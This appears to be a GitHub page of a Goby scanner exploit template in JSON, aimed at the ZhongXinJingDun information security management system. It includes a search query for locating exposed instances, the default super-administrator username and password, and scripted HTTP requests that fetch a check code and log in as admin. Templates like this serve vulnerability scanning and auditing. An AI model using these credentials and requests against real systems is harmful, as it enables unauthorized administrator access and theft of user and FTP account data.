forked from k3vi-07/goby-exp
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathZhongXinJingDun_Default_administrator_password.json
92 lines (92 loc) · 3.94 KB
/
ZhongXinJingDun_Default_administrator_password.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
{
"Name": "ZhongXinJingDun Information security management system Default administrator password",
"Level": "1",
"Tags": [
"Default administrator password"
],
"GobyQuery": "title=\"中新金盾信息安全管理系统\"",
"Description": "The default weak password exists in Zhongxin Jindun information security management system of Zhongxin Network Information Security Co., Ltd., and the login identity is super administrator User:admin Pass:zxsoft1234!@#$",
"Product": "ZhongXinJingDun Information security management",
"Homepage": "http://www.cnzxsoft.com/",
"Author": "PeiQi",
"Impact": "<p>After logging in, the attacker can obtain user information, FTP account password and other sensitive information<br></p>",
"Recommandation": "<p>Modify account password<br></p>",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "?q=common/getcode",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$head",
"operation": "contains",
"value": "check_code",
"bz": ""
}
]
},
"SetVariable": [
"output|lastheader|regex|check_code=(.*?);"
]
},
{
"Request": {
"method": "POST",
"set_variable": [
"check_code|lastheader|regex|check_code=(.*?);"
],
"uri": "?q=common/login",
"follow_redirect": false,
"header": {
"Cookie": "check_code={{{check_code}}}",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"data_type": "text",
"data": "name=admin&password=zxsoft1234!@#$&checkcode={{{check_code}}}&doLoginSubmit=1"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "1",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-03-31 12:13:59",
"GobyVersion": "1.8.237"
}